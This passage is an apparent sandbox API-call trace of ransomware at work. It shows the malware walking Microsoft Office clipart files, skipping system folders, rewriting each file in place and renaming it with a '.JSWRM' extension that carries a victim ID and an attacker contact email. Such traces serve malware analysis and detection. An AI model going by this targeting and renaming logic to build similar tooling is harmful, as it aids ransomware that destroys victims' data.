lpNumberOfBytesWritten=0x345e898*=0x25a0, lpOverlapped=0x0) returned 1 [0096.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.963] CloseHandle (hObject=0x314) returned 1 [0096.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0096.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0096.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0096.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0096.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0096.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0096.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.963] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00917_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00917_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00917_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00917_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0096.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0096.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0096.964] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f5c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00918_.WMF", cAlternateFileName="")) returned 1 [0096.964] lstrcmpiW (lpString1="SO00918_.WMF", lpString2=".") returned 1 [0096.965] lstrcmpiW (lpString1="SO00918_.WMF", lpString2="..") returned 1 [0096.965] lstrcmpiW (lpString1="SO00918_.WMF", lpString2="...") returned 1 [0096.965] lstrcmpiW (lpString1="SO00918_.WMF", lpString2="windows") returned -1 [0096.965] lstrcmpiW (lpString1="SO00918_.WMF", lpString2="recovery") returned 1 [0096.965] lstrcmpiW (lpString1="SO00918_.WMF", lpString2="perflogs") returned 1 [0096.965] lstrcmpiW (lpString1="SO00918_.WMF", lpString2="documents and settings") returned 1 [0096.965] lstrcmpiW (lpString1="SO00918_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.965] lstrcmpiW (lpString1="SO00918_.WMF", lpString2="system volume information") returned -1 [0096.965] lstrcmpiW (lpString1="SO00918_.WMF", lpString2="msocache") returned 1 [0096.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0096.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00918_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00918_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00918_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0096.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00918_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00918_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00918_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0096.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0096.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0096.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00918_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00918_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.966] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8028) returned 1 [0096.966] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f50) returned 0x205850 [0096.966] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1f50, lpOverlapped=0x0) returned 1 [0097.005] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.005] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f50, lpOverlapped=0x0) returned 1 [0097.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0097.006] CloseHandle (hObject=0x314) returned 1 [0097.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0097.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0097.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0097.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0097.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0097.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0097.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.006] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00918_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00918_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00918_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00918_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0097.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0097.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0097.007] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2944, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00935_.WMF", cAlternateFileName="")) returned 1 [0097.008] lstrcmpiW (lpString1="SO00935_.WMF", lpString2=".") returned 1 [0097.008] lstrcmpiW (lpString1="SO00935_.WMF", lpString2="..") returned 1 [0097.008] lstrcmpiW (lpString1="SO00935_.WMF", lpString2="...") returned 1 [0097.008] lstrcmpiW (lpString1="SO00935_.WMF", lpString2="windows") returned -1 [0097.008] lstrcmpiW (lpString1="SO00935_.WMF", lpString2="recovery") returned 1 [0097.008] lstrcmpiW (lpString1="SO00935_.WMF", lpString2="perflogs") returned 1 [0097.008] lstrcmpiW (lpString1="SO00935_.WMF", lpString2="documents and settings") returned 1 [0097.008] lstrcmpiW (lpString1="SO00935_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.008] lstrcmpiW (lpString1="SO00935_.WMF", lpString2="system volume information") returned -1 [0097.008] lstrcmpiW (lpString1="SO00935_.WMF", lpString2="msocache") returned 1 [0097.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0097.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00935_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00935_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00935_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0097.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0097.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00935_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00935_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00935_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0097.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0097.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0097.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0097.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00935_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00935_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.009] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10564) returned 1 [0097.009] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2940) returned 0x24d210 [0097.009] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2940, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2940, lpOverlapped=0x0) returned 1 [0097.011] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.011] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2940, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2940, lpOverlapped=0x0) returned 1 [0097.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.011] CloseHandle (hObject=0x314) returned 1 [0097.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0097.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0097.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0097.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0097.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0097.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0097.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.012] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00935_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00935_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00935_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00935_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0097.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0097.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0097.013] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1960, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00938_.WMF", cAlternateFileName="")) returned 1 [0097.013] lstrcmpiW (lpString1="SO00938_.WMF", lpString2=".") returned 1 [0097.013] lstrcmpiW (lpString1="SO00938_.WMF", lpString2="..") returned 1 [0097.013] lstrcmpiW (lpString1="SO00938_.WMF", lpString2="...") returned 1 [0097.013] lstrcmpiW (lpString1="SO00938_.WMF", lpString2="windows") returned -1 [0097.013] lstrcmpiW (lpString1="SO00938_.WMF", lpString2="recovery") returned 1 [0097.013] lstrcmpiW (lpString1="SO00938_.WMF", lpString2="perflogs") returned 1 [0097.013] lstrcmpiW (lpString1="SO00938_.WMF", lpString2="documents and settings") returned 1 [0097.013] lstrcmpiW (lpString1="SO00938_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.013] lstrcmpiW (lpString1="SO00938_.WMF", lpString2="system volume information") returned -1 [0097.013] lstrcmpiW (lpString1="SO00938_.WMF", lpString2="msocache") returned 1 [0097.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0097.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00938_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00938_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00938_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0097.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0097.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00938_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00938_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00938_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0097.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0097.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0097.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0097.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00938_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00938_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.014] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6496) returned 1 [0097.014] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1960) returned 0x205850 [0097.014] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1960, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1960, lpOverlapped=0x0) returned 1 [0097.016] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.016] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1960, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1960, lpOverlapped=0x0) returned 1 [0097.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0097.016] CloseHandle (hObject=0x314) returned 1 [0097.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0097.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0097.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0097.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0097.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0097.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0097.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.016] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00938_.WMF" (normalized: 